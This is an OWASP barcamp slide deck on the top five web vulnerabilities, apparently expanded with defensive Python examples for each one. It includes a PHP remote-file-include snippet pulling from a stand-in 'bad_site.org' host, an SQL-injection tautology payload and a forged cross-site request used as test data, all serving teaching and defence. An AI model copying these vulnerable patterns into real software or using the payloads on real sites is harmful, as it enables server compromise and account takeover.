Hacker’s Secrets, by Sharmishtha Gupta ([email protected])

Owasp Hacker Secrets Barcamp


DESCRIPTION

Introduction of OWASP, OWASP Top 5, Network Security vs App Security and demos with webgoat.


Page 1: Owasp Hacker Secrets Barcamp

Hacker’s Secrets

Sharmishtha Gupta, [email protected]

Page 2: Owasp Hacker Secrets Barcamp

Agenda

What is OWASP?

Web security vs Network security

OWASP Top 5
◦ XSS
◦ SQL Injection
◦ Malicious File Execution
◦ Insecure Direct Object Reference
◦ Cross Site Request Forgery (CSRF)

Page 3: Owasp Hacker Secrets Barcamp

What is OWASP?

Open Web Application Security Project

Mission: An open community focused on web application security

Page 4: Owasp Hacker Secrets Barcamp


Global Community

Local Bangalore Chapter: http://www.owasp.org/index.php/Bangalore

Open source projects and tools to improve web application security

Open learning resources and forum on web security

Page 5: Owasp Hacker Secrets Barcamp


[Diagram: Attacker, Web Server]

Network Security

• Challenge is to restrict access to the network and network resources (servers)
• To protect data being exchanged over the network from eavesdroppers
• Mostly network layer stuff (packet filtering, firewalls etc.)

Page 6: Owasp Hacker Secrets Barcamp


[Diagram: Compromised Web Server, Victim]

Web Security

• Network is already accessible on port 80 (or other webserver port)

• Challenge is to protect the other network resources that are not exposed, e.g. information stored in the db and other backend information

Page 7: Owasp Hacker Secrets Barcamp


Top 5 webapp vulnerabilities
◦ XSS
◦ SQL Injection
◦ Malicious File Execution
◦ Insecure Direct Object Reference
◦ Cross Site Request Forgery (CSRF)

Page 8: Owasp Hacker Secrets Barcamp

XSS

When user-provided data is used without validation and/or encoding

An attacker can execute a script in victim’s browser and hijack important user information without her knowing

Ex: Alice sends a scrap to Bob on Orkut with a scriptlet. When Bob opens his scrapbook, everyone in his network is sent spam scraps posing as Bob by the scriptlet.
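The defence the slide points at is output encoding: whatever a user typed is treated as text, never as markup, when it is written into someone else's page. The following is an added example (not code from the talk), written in Python rather than the deck's PHP so the rendering logic can be run stand-alone. The scrap text, the `render_scrap_*` helpers and the `foreign_tags` checker are all constructed for this illustration; the hostile scriptlet is an inert placeholder.

```python
import html
import re

# Constructed sample "scrap" from a hostile sender (placeholder scriptlet,
# standing in for the scriptlet on the slide).
SAMPLE_SCRAP = "Hi Bob! <script>spam()</script>"

# Tags the template below emits itself; anything else in the output came
# from user data.
WRAPPER_TAGS = {"div", "b"}


def render_scrap_unsafe(author, body):
    """Vulnerable rendering: user data is pasted into the HTML verbatim, so a
    <script> element in the scrap runs in every reader's browser."""
    return f"<div class='scrap'><b>{author}</b>: {body}</div>"


def render_scrap_safe(author, body):
    """Hardened rendering: every user-controlled value is HTML-encoded for the
    element-content context before it is placed in the page. The scriptlet is
    still displayed, as text, but the browser never parses it as a tag."""
    return (f"<div class='scrap'><b>{html.escape(author, quote=True)}</b>: "
            f"{html.escape(body, quote=True)}</div>")


def foreign_tags(rendered):
    """Review/test helper: the set of tag names present in the rendered HTML
    that the template itself did not emit. A non-empty result means user data
    reached the page as live markup (an XSS indicator)."""
    found = {m.lower()
             for m in re.findall(r"<\s*/?\s*([A-Za-z][A-Za-z0-9]*)", rendered)}
    return found - WRAPPER_TAGS


if __name__ == "__main__":
    print("unsafe:", foreign_tags(render_scrap_unsafe("Alice", SAMPLE_SCRAP)))
    print("safe:  ", foreign_tags(render_scrap_safe("Alice", SAMPLE_SCRAP)))
```

`html.escape` is the right tool only for the element-content and quoted-attribute contexts shown here; data written into a URL, a JavaScript string or a CSS value needs the encoder for that context, which is why frameworks ship context-aware templating rather than a single escape call.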

Page 9: Owasp Hacker Secrets Barcamp


A real example is the “Samy worm” on MySpace.com, discovered in October 2005: http://namb.la/popular/tech.html

Demo

Page 10: Owasp Hacker Secrets Barcamp

SQL Injection

When user-provided data is sent to an interpreter (here SQL) as part of a command or query

An attacker can trick the interpreter into executing unintended commands or changing data

Demo
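The slide's point, that the interpreter cannot tell the developer's query text from the user's data once they are concatenated, is easiest to see side by side with the fix: pass the data as bound parameters so it never becomes part of the SQL grammar. This is an added example, not code from the talk; it uses Python's standard `sqlite3` module with a constructed in-memory `users` table, and the `login_*` function names are invented for the illustration.

```python
import sqlite3


def make_db():
    """Constructed sample data: three users in an in-memory SQLite database."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT, password TEXT)")
    conn.executemany(
        "INSERT INTO users (name, password) VALUES (?, ?)",
        [("alice", "pw-a"), ("bob", "pw-b"), ("carol", "pw-c")])
    return conn


def login_vulnerable(conn, name, password):
    """Vulnerable: user data is spliced into the query string, so quote
    characters in the input change the shape of the WHERE clause."""
    query = (f"SELECT name FROM users WHERE name = '{name}' "
             f"AND password = '{password}'")
    return [row[0] for row in conn.execute(query)]


def login_safe(conn, name, password):
    """Hardened: the query text is fixed; the driver binds name and password
    as values, so whatever they contain is compared literally."""
    query = "SELECT name FROM users WHERE name = ? AND password = ?"
    return [row[0] for row in conn.execute(query, (name, password))]


if __name__ == "__main__":
    db = make_db()
    # The textbook tautology input: with string splicing it rewrites the
    # WHERE clause; with parameters it is just a password that matches nobody.
    crafted = "x' OR '1'='1"
    print("vulnerable:", login_vulnerable(db, "alice", crafted))
    print("safe:      ", login_safe(db, "alice", crafted))
```

For logging and detection, the useful signal is the same mismatch: a request whose form field contains quote characters or SQL keywords and a query that then returns far more rows than a login ever should (three users for one login attempt here).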

Page 11: Owasp Hacker Secrets Barcamp

Malicious File Execution

When user-provided input is used for executing remote code or loading local files

Allows attackers to include hostile code and data; can totally compromise the server

Page 12: Owasp Hacker Secrets Barcamp


Most common sources of code injection are:
◦ Dynamic paths/files used in require/include statements
◦ eval(): a major source of code injection is the improper validation of user-provided inputs passed to eval()

Page 13: Owasp Hacker Secrets Barcamp


<?php
// dynamic path: this is the value an attacker would supply as ?path=...
$_GET['path'] = 'http://bad_site.org';
// the include target is built from that value, so a remote file is loaded
include "{$_GET['path']}/header.inc";
?>
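The fix for the `include "$_GET['path']/header.inc"` pattern on the slide (and for the dynamic require/include sources listed on the previous slide) is to stop treating the parameter as a path at all: map it onto a fixed allow-list of names the application ships, build the real path server-side, and re-check that the result stays under the template root. The following is an added example, not the talk's code, written in Python so it can be run; the template directory, the theme names and the function names are assumptions made for the illustration.

```python
import posixpath

# Assumed application layout (placeholder values for this example): each
# theme directory under TEMPLATE_ROOT contains a header.inc.
TEMPLATE_ROOT = "/var/www/app/templates"
ALLOWED_THEMES = {"default", "blue", "dark"}


def classify_include_value(value):
    """Label a ?path= value for logging and alerting. Anything other than
    'ok' is an attempt to make include() load something the app never
    intended, and is worth recording with the source address."""
    lowered = value.lower()
    if "://" in lowered:
        return "remote-url"      # the http://bad_site.org case from the slide
    if "\x00" in value:
        return "null-byte"       # never valid in a path name
    if ".." in value.split("/"):
        return "traversal"       # climbing out of the intended directory
    return "ok"


def resolve_header_include(value):
    """Safe replacement for building the include path from user input: only
    allow-listed names are accepted, the path is assembled server-side, and
    the normalised result must still lie under TEMPLATE_ROOT."""
    if value not in ALLOWED_THEMES:
        raise ValueError(f"rejected include ({classify_include_value(value)})")
    candidate = posixpath.normpath(
        posixpath.join(TEMPLATE_ROOT, value, "header.inc"))
    if not candidate.startswith(TEMPLATE_ROOT + "/"):
        raise ValueError("path escapes template root")
    return candidate


def include_is_rejected(value):
    """True if resolve_header_include refuses the value."""
    try:
        resolve_header_include(value)
        return False
    except ValueError:
        return True


if __name__ == "__main__":
    for v in ["blue", "http://bad_site.org", "../../etc/passwd"]:
        print(f"{v!r}: {classify_include_value(v)}, "
              f"rejected={include_is_rejected(v)}")
```

In PHP the same shape is a `switch`/array lookup on the parameter followed by `include` of a literal path; the allow-list makes the later `startswith` check redundant, but keeping it costs nothing and catches a future maintainer who relaxes the list.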

Page 14: Owasp Hacker Secrets Barcamp

Insecure Direct Object Reference

If a developer exposes a reference to an internal implementation object, such as a file, directory, database record, or key, as a URL or form parameter

Attackers can manipulate those references to access other objects without authorization
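Two defences follow from the slide's description: either keep the direct reference but re-check ownership on every access, or hand the client an opaque per-session handle so it can only name objects the server already gave it. The following is an added example (not code from the talk), in Python so it can be run; the invoice records, the `Session` class and the `fetch_invoice_*` names are constructed for the illustration.

```python
import secrets

# Constructed sample records: real database id -> (owner, contents).
INVOICES = {
    1001: ("alice", "Invoice 1001 for alice"),
    1002: ("bob", "Invoice 1002 for bob"),
}


class Session:
    """Minimal stand-in for a server-side session."""

    def __init__(self, user):
        self.user = user
        self._ref_map = {}   # opaque token -> real id, private to this session

    def reference_for(self, real_id):
        """Issue an opaque handle instead of exposing the database key."""
        token = secrets.token_urlsafe(12)
        self._ref_map[token] = real_id
        return token

    def resolve(self, token):
        return self._ref_map.get(token)


def fetch_invoice_direct(session, invoice_id):
    """Vulnerable: trusts the id from the URL or form field and never asks
    whether the caller owns that record."""
    return INVOICES[invoice_id][1]


def fetch_invoice_checked(session, invoice_id):
    """Hardened variant 1: a direct id is acceptable if every access
    re-checks that the record belongs to the logged-in user."""
    owner, body = INVOICES.get(invoice_id, (None, None))
    if owner != session.user:
        raise PermissionError("not your invoice")
    return body


def fetch_invoice_indirect(session, token):
    """Hardened variant 2: the client can only name objects this session was
    handed; the ownership check is still applied on top."""
    real_id = session.resolve(token)
    if real_id is None:
        raise PermissionError("unknown reference")
    return fetch_invoice_checked(session, real_id)


def access_denied(fetch, session, ref):
    """True if the given fetch function refuses the reference for this session."""
    try:
        fetch(session, ref)
        return False
    except PermissionError:
        return True


if __name__ == "__main__":
    bob = Session("bob")
    print("direct, bob reads 1001:", fetch_invoice_direct(bob, 1001))
    print("checked, bob reads 1001 denied:",
          access_denied(fetch_invoice_checked, bob, 1001))
```

Failed lookups in the checked and indirect variants are the detection hook: a user requesting ids or tokens that are not theirs, especially sequential ones, is the behaviour the slide describes.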

Page 15: Owasp Hacker Secrets Barcamp


Poor error handling is the main cause

Demos
◦ Bad file inclusion
◦ SQL connect failure

Page 16: Owasp Hacker Secrets Barcamp

Cross Site Request Forgery (CSRF)

An attack that forces a logged-on victim’s browser to send a pre-authenticated request to a vulnerable web application

This can be as powerful as the web application that it attacks

Page 17: Owasp Hacker Secrets Barcamp


Mostly when the source of the request is not validated

Gmail change password CSRF vulnerability disclosed by Vicente on 3rd Mar 2009
◦ http://seclists.org/fulldisclosure/2009/Mar/0029.html

Demo
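Because the browser attaches the session cookie to any request aimed at the site, the password-change handler described on the two CSRF slides cannot rely on the cookie alone; it needs evidence that the request originated from the application's own pages. The standard answer is a per-session secret token embedded in the form (which a cross-site page cannot read) plus a check of the `Origin`/`Referer` header when a browser supplies one. The following is an added example, not the talk's code or Gmail's; it is Python, the site origin and the dict-shaped request are assumptions for the illustration.

```python
import hmac
import secrets
from urllib.parse import urlparse

# Assumed origin of the application (placeholder for this example).
SITE_ORIGIN = "https://mail.example"


def issue_csrf_token(session):
    """Generate the per-session token that forms must echo back. The page that
    renders the change-password form embeds it as a hidden field."""
    token = secrets.token_hex(16)
    session["csrf_token"] = token
    return token


def request_is_trusted(session, request):
    """True only if the state-changing request carries the session's token
    and, when the browser sent Origin or Referer, that header names our site.
    Forged cross-site requests fail the first check because the attacker's
    page cannot read the token, and the second because their origin differs."""
    expected = session.get("csrf_token")
    supplied = request.get("form", {}).get("csrf_token", "")
    if not expected or not hmac.compare_digest(expected.encode(), supplied.encode()):
        return False
    headers = request.get("headers", {})
    source = headers.get("Origin") or headers.get("Referer")
    if source is not None:
        parts = urlparse(source)
        if f"{parts.scheme}://{parts.netloc}" != SITE_ORIGIN:
            return False
    return True


def change_password(session, request):
    """Handler for the sensitive action; returns an HTTP-style status code."""
    if not request_is_trusted(session, request):
        return 403
    session["password"] = request["form"]["new_password"]
    return 200


if __name__ == "__main__":
    session = {"user": "bob", "password": "old"}
    token = issue_csrf_token(session)
    # Constructed requests: one forged from another origin without the token,
    # one legitimate submission of the site's own form.
    forged = {"headers": {"Origin": "https://evil.example"},
              "form": {"new_password": "pwned"}}
    legit = {"headers": {"Origin": SITE_ORIGIN},
             "form": {"new_password": "fresh", "csrf_token": token}}
    print("forged:", change_password(session, forged))
    print("legit: ", change_password(session, legit))
```

Rejected requests that carry a valid session cookie but no token, or a foreign `Origin`, are exactly the events to log; a burst of them against the change-password endpoint is the forgery attempt in progress.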

Page 18: Owasp Hacker Secrets Barcamp

Visit WebGoat from OWASP
◦ Good to solve the puzzles by learning vulnerabilities
◦ Good hints and solutions
◦ Download from http://code.google.com/p/webgoat/downloads/list

Page 19: Owasp Hacker Secrets Barcamp